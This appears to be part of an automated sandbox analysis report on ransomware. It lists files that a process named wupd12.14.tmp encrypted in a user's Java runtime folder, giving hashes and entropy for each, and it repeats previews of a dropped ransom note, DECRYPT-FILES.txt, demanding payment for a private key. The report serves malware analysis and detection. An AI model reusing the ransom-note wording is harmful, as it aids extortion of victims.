Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\.jre\lib\calendars.properties Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	792
Entropy (8bit):	7.722258873798821
Encrypted:	false
MD5:	9674B92BF0AEFD783B6FF283C2803AEE
SHA1:	ECC3282D2F0C63DC007E7FE2BC80186ABEEF6619
SHA-256:	E1A089B7DA6A2A114954AF4D889F38FDC0DADB74523487F5DBD8CC15A5AF7333
SHA-512:	C0F334D1B038D4D833A2631D70564271B63B6A1F3D1870499A2CFD121BD33F2A3BFC55891FBD7FA2B8AF87B89071A24C65755A755E8F574131D800C95767A7D9
Malicious:	false
Preview:	....+6...\.]...s.F.f@.C)......Sf4Wj.T0...C.....La..w.....)...4k..9j.8[..+..+}6.{G...T\..TI....Hz.....2.....BY.......?.Na..\|o[.9....V..IcL.p...Xph.J.R\|=...,}p3.../.s..)S...O...W..].......P[Z/..V.?.......#.y...E..f...w.i"u..+....S.QW.P.#0ip9=NAxR....f.afM..n....'...N..a.`......@p..V...-.f...G..=p.....k....l~..A",....Y.>.ag".r..."....l...Tc{....~.z(2...z..WvJ+..#._k.....F...W.D.Hc.........V..\=......N.....-...3.1......E...Y.D.X3.E#2................6B.h..=..B..34.}.?.z.;s\....(X....e'k..K...w....f.af...(..........K;...+y.D.R.........K(p.s....F...cB....b.}.........+(.....\|.c...d...7...q........7..,6...j..\X......d....mue...._4...A.l.l.wk-2........d...j..F..1!...>j........Hv..L.T..^,wDh/%)../..G.P.n..O7.$!...?.;x....*....._.&z..A.: .. !....f.af

C:\Users\user\AppData\Roaming\.jre\lib\cmm\CIEXYZ.pf Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1848
Entropy (8bit):	7.861088993551805
Encrypted:	false
MD5:	EA62F907DF17122B0E6181671BE1D562
SHA1:	212D3B96AC36C75D9809AC47F1745F50B5E6E2AA
SHA-256:	55EFF27D418CE1F0E2FB1B45BA5515705F5E3D0F291F241CD4FDA2E3BF3862BE
SHA-512:	9DA5E59C337FFB08AEF6F92C6FCD5DC31FB170FEC9BF80FD674320C9D31411A390859BDBF2A76F054DAB18A1D1FF881944E5BC650520B67143AF620A67AD53B7
Malicious:	false
Preview:	...<..%.#....(B..P.(......w..^...ous1g..)C.}.. .Y.tG..V..H.....K...S....6..i...'.`..HH.&.....=./e-.....~$...QY.a...fbhm.....l/..Z.8.H}...J.7.&{..M).k..+....V........QS3.sL.A.N.........]...?.6.v#.%.D_...d>HS.8r....y..&s..<\...NQ#.D...s_.f^......f.af.7Y..c../......a.D.v+...\.[..\E...&..y.si:'."g.}..G..k....QQx..#.g/..g.~../.c;.@.sx.A..........@l#....H~...D ..&....'%..Y...fNB....A[V.......mj/-R...0.wnwA(...........P.......N.u..2S....V...>.....x.R...j..3wD.Nm..4~.#I@.Q.M.......6w..+c;.K]..........f.af<i......Xb~W..6{../-44..p........Qs.L/....t4.LT......T;:C.....\|_.vz....s..W5.....6~.z....Af.\|<1.0....B.#G.4.....@..K&eG...\..(N......6&.S.,".qS......oT.ky..l,...r8-.K.$...../Mm."..\|6.../...T."bS..{....+=...........u(^0..o.1A..3.....9(z[.g....f.af...&@.Z...2..1&2.f......;..6Y./...mD....\|,.....\....w...{..29.....`......bw.}.....C.5...Fc.....m(....T4..-..Z...`...m..U.O........L1..O. "..51...V.G.8..7..:f.$:nm....%..?.....'....V..<.Y....CVVe..N

C:\Users\user\AppData\Roaming\.jre\lib\cmm\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\.jre\lib\deploy\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\.jre\lib\deploy\ffjcext.zip Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	4752
Entropy (8bit):	7.933027304941103
Encrypted:	false
MD5:	E262CCE076791CA30F31EE9C9DD98D3F
SHA1:	18FEEF75FAB0530FFBA17352406EEEB245E091A0
SHA-256:	1975A3DEA3941CB1798587352747281F477783A6C26CE047A17B4AD79DFA528B
SHA-512:	77438DC8FEF189D2E529A642AFD11D60F2354A6186DD23825CDC3E92FE4D5BC35352E2F9145A10A5A1028AEF67D51CBB622B6DC859BC38AE9CBA5B89AED8C242
Malicious:	false
Preview:	.d.x5.B..j.].:2p..fK.0.\|...M[.ts..O~.^....y./.....$Oi.'..l..Aq.Z..9..X.&a}..u.t.K..2Y.1:U.6/.......{.......[.1:....3.hP..%.ey%..(So...\|L....\...~Z._..e....k.....1T...y.k..a.b.?../st...4H9)...pb.=C;...Q.DI.h.Ur...#....T..../&...F.....y..D....f.af].p.u..5..8....NH....l............3..q...t{3%e.D'2wb/......D}...;.P..xi^ .....V.M......}q^.k...#..X!8....M,s.B.'_...$.%K3.....[.......$...-.Qf....F...~8W.g.D.[v..W..kc_.._X.,../........E...CK..z~6..P..t.._[t.Q.mU........5z,z.^t..d.3..vZ.]..........f.af.:...w.u'4..$lA.A..NX.......x.(.Gw....2....j..._'\|..<.3h.{4'.O...B..~...Jb..4.=...1....)...q...G...Iz.".'.....#.R`].9.6...w......b.8E........hP...`C.T.2.\|rO._.j.{...7...`T....L..............xm.(.- wJ.$....6i=......6&...:.z.O2.l..\|\|.aD..S&{..M....f.af;4Rh.....q...!.....,...Q.........0X..8..>..F'..\I..../.E......#..1.Z...3..\.l.E..?.......J....L.u.%@..\.`..>ZtI4e'.Hw.3.-$..dO..a...=.d..F.....xS..DIDFzu.6]..q.1c.T.g.acD..;4(.....<.8SU..j_..m

C:\Users\user\AppData\Roaming\.jre\lib\ext\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\.jre\lib\ext\access-bridge.jar Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1056
Entropy (8bit):	7.763042981192158
Encrypted:	false
MD5:	CDF3D6153E85D45AF8CFC18A7BC730D6
SHA1:	2739416E2D205769317B562C41E8316E65B06EB0
SHA-256:	2B2DFDA245BE0CC1E1D16F521D44B89084D37D3FE6304188F0FB39804DD7AB8B
SHA-512:	B143D13ADD385CB4E9E287EE9822C255642B91EAB105FE67DBDB814387FAC09D47929912454D8BBC233A2C5B2EEE146CA9F50DC63BC1736396B35B2CCAE2422C
Malicious:	false
Preview:	...Z.Y.....2=i.0.$...BF..!......=..}..k.M.....?.Y..L......0....X....C.....o..]...M1....A.~...aK....k.........B.4.o..q.@s"e.T..@+.o.1Qk..<....P.-q..[.E.Yo.0....H.q..Q......z.]=..q(^.L...H}.T..a.B8.R.3..%k...W+..C2.......@m....f...d..cTX..._.....f.af)...o.\.I.n....Uo....r...< ......A.. ....?.IB....ZG.w..ZK....Y...X...~._..F.......g.V..p..t...".c..s..o........../...[;.W.W...].'.E!.\P..r...X.O?...mA.-..q.s...@3H.\|...^.`RA=E....K.Z.....i.41c..a;.....g.j.w.hI.....-........y]...L.....x....f.af2."s.t..r-.n.....s.C.0....Q.B...?..\.&..5...-.}:5..Q..k....!...[R.,L.14.j>p...4....O..>i....t..../k..._T..+OuT.e.+........m..M.L.X..d..d.5AF.B..Mz.2.x..D..;.n.#Z}E..M.D,Yc..0~.r.........o..A........P_.P.R9...........j..-...._.7.n.s.......~....f.af.A.........p.IU.iK..HUw.aB.......%wU.P. #M7.....[u...B.bXg.U.$.n!Y...@P.....!......I.J^../5NV.^y....s.eY..}.6.....2.....4.~..K.&.o.).g.".JC.`....... ..2./wx0?..g .A.r.....O.]Cn.7~..@}...S.....

C:\Users\user\AppData\Roaming\.jre\lib\ext\jfxrt.jar Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	18238335
Entropy (8bit):	7.9999900967923825
Encrypted:	true
MD5:	2C6014B801417FB7066130F613FCAD3D
SHA1:	A1A778054E04B0FE085AD8223BED7B060BA2EA5D
SHA-256:	B0088FD2C26AD0756B9A99121ACB7C62E793FFA5416926B51AF9D0FAADF38C8F
SHA-512:	D85A68F4949B762A11725C49C33F2E8D7C3AC69AECC7543491C737AB1E010AB6B8DC050378E8B01DDCCDAF513EC11DCC4B4AB1FADC9D03D3A86CD91A9C4FB3BB
Malicious:	false
Preview:	Z.a..}9./..........,..Jb..zvX....d..,....T.D.Z U.od....5SHYS....5........"....8...d..).`w0..[}....j....j'."...^...Z.U......l.....f..x..POo. .P@..4@..-.]...#O.c..].. ._...-Z....E...'m..4.u.889.L._.M.Meu.S.Pd{..vI..}.7q~P.V..^..6.y........b./..H...}N!>...!.....'....6q..s..3......6c..b.....f.m..`v.u..R!..'.n..2}.9.l.M2.. ! .....r.8...X.!.!..uG.N.D;........ZCx..Z.{..l.y...A.r,...(.l...p..%!.(n)D.9.....>.b?.......Z.N..2....2....fP.r.].......b...7.o..k3>1I.h..%Of.F......T.O...j.W.+u.;I.6..`...g.N...:.mA.bv.$./.n.G.%..sF%a{D'.?..j..d2......{H.A..I....x....=iA.W#1._6.Vx.WLa.E...iL&_!?.{q.,.;...%%8.."s.{'.^....Tu_60.....2.H.\|..$C...q.Uh......S.......f.9.P7MM<Au.e/...?...dD../t>%C.c.....k.B.p.>.,2..t......(......./...[I.oqV..w_.$1..f..>...8.\....].70u....E.....x.S..Ra..bs.7..%w..G..z..:...&:...N%..F.....3.c..w..3.....%...R.-....E...R..C&......3!LbM.&L<.\.S....V$..Fg..fi....pY.O{..!.....>-....g;].2..J.*l...g@..k........3.../.Q..[..E..X.'..-.Q.x.[./..P..

C:\Users\user\AppData\Roaming\.jre\lib\ext\localedata.jar Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	2904
Entropy (8bit):	7.901835309161013
Encrypted:	false
MD5:	E214604D6DFAAC7F1687AE9A2BAA82AE
SHA1:	64A9F82476B9630A44C9F1E21B54E2CD24B6CB38
SHA-256:	79F2721E5630A0966137C8F6DDE8C8C9595D93CABF2172B98A3CFDC720EAB973
SHA-512:	2D6C5372251C053F61446757431C4A5346574D2ED445FE10078261FE3D6D79CF5A61D94E6B97BD15675FF210CA5D50CA412C2998FD8C876870CDE3414260A7D3
Malicious:	false
Preview:	z~q..5.1....../.E.v.......9...E.H..W0....k..MP.:/f0tM....rgM\.6......:.EX..:4.J..c..dR9J...+.......b...+hu..g.W.p...v.W.;0~3.....s...C.c.... ...c.h.c..C...4.B..)pfJ.O\.dC.J..X.....~../.....v......'.Qmt...bp...x.]sW1...Xg..1....)R%.e.0.S.......f.afP..6Y..D+F...Y?P.3A.`...s.5.LE.@..^.....+2......,...!n........im$.....\|.]O5...]..w7.R$P.....S.!......o.%.`./....#....s0..C.......T.$.....d.a\.%V.....Y......E....../..P.....8;...P.D.E>......M?.;...T....S....oe.6.!....E..D..u{..X...(/..3n..;j.....f.afu....`..V=.3E.C..oK+.....>]KF.=q......6...6.E9...-..M^Akn#.$\|.,..}.3..._..k5.)..E.?SL..o...%..X2>.8}/.A......<.........#.-.......F...M)+... .[v..i..l.-.}..>......h...t...Y.[.>.X.Y.D.I..3.~..y=.dr..b..!..V....h.p.Z1..&%......z...&p...,.Z.....f.af4/.Qx..g..#,.>...\|.4..ZZ.........u\|...^".......b8.6.9...-U..}.....,.<.....f~..._.2.......B..B.bQ.."i.wl.7......6..........m4..>4..=\|b...Y6....#..p.........F..>.....+...zE.Z9'.e......L}..V...=...c.

C:\Users\user\AppData\Roaming\.jre\lib\fonts\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\.jre\lib\fonts\LucidaBrightDemiBold.ttf Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	2376
Entropy (8bit):	7.89815155935613
Encrypted:	false
MD5:	35306274700C0FA8F7C448A03D3DF997
SHA1:	DA5EF6107A2E6148D7EB752DA09A34E481D29CD3
SHA-256:	3C5445CC7070DBBC99342E1701A8604E7510363CDA157E82AB891E2C2C999D0F
SHA-512:	185DE888A3DC427F26AC2E6CB8148C1395EF87F2E460983A585C92CEE5A1D268B3A4D3A471951738735F6D0EDEEA94760146B37A59F029015E6169E89BE55A9A
Malicious:	false
Preview:	...Qx.s..\.zW.a...........M...2....IZ.m...Sq..8C..i.iU.E.....[.E!.......B...~.y..........2r...w..b..iWJl...\|.{.....u..<t..8...W.9..b..0.O..........u..........u...n......+Q..X..........+.3.X...w.:......"u.......=%.l..:.M..P...ugI_+..I..y..u.Q....f.af.,...:T0UjV...O0ez..\|.U.$t.#......\la.8........%.~.[..h8_..#...........-u.<.;.F.d.g`A4<...\.b1.. .H2.s.zLRA..j..G(...;"....(..H..".J..Z?......f.lW....J.8...+....+....g,q.x.V~d.....bsF.%g..k.....^......../...).T/...Mh.........."j.n..c-.e.W.,.......f.afeH.....?_o.Q~}..R@.z.HD./......./ 7.K....q..8..!..N...].uj5...>.....}..>o.:..........-..[ex.r.r..C....)e..%...x@F...`b!.....U[..Q..-1..."...t.:;...,.z.F...o..w...n..x...[..9.R.^.gB./......EA.~..L.+..j....q4.....v%..._....Q.o-0....t.c.xA.../w....f.af^....e..i....0:..6..q...f.."y..&.L..u.].....[.^.......j:.....8+...Q...}&WGH.Y=.j...r.....(.!..0.`_...3W.....U.......F......>...7.@..}.b.[..^...4G.XHB.K.X.p....x.\|%.<)'y(..fo.m........H....`.'{.).

C:\Users\user\AppData\Roaming\.jre\lib\i386\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\.jre\lib\i386\jvm.cfg Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.1280052122880795
Encrypted:	false
MD5:	DA644D6D210BE9A6D6E2D207F3EBACE8
SHA1:	18624211B996FB969E03791FEEEC947E0C0816A4
SHA-256:	BDCC11ECB89E1B0072EF15C6599797E51C1A3040A9CEC55C12DE36A87D76F768
SHA-512:	46296F1482B01E4A61FDA6273F642A7497A43915260525B63DD603440A6934CD3369DE2D5B0845A78B4A28F1CCA81BD4E5D6CC7EAFFDA3109F74E029339D13B5
Malicious:	false
Preview:	..~...t.-.8.81...F.8c.L\|^.....X+..\.....W...>..#.......x..~?....)o.#...>.OOp....r....;.(....1.......V...f..+..Z....eG.x....5^.`.%..\c..92(.J...b...^...5'O....?.A.q...;...Z..p.U.a..3Wz...$.t.EV.G.5......V...!0{..V..t.....\|.u..SWX.1....'...,.Ly.....f.af

C:\Users\user\AppData\Roaming\.jre\lib\images\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	18376
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	17C90D15AE0F70CEB0500DC1677C0638
SHA1:	0F645ECE404416F3152689E94539178C658E583F
SHA-256:	7160B9035F4E47A92C4608C45541FB42D07FAD13BB8F4EC07B466DE7694BC11C
SHA-512:	719BC7E235B7901B2D28485A9D9396BF0F787DF34DD667CD7A84F63F8048EF12EBB5EDF2AD5775320B54C1E2515F131359C049AE2509EE510774DE84F03C4008
Malicious:	false
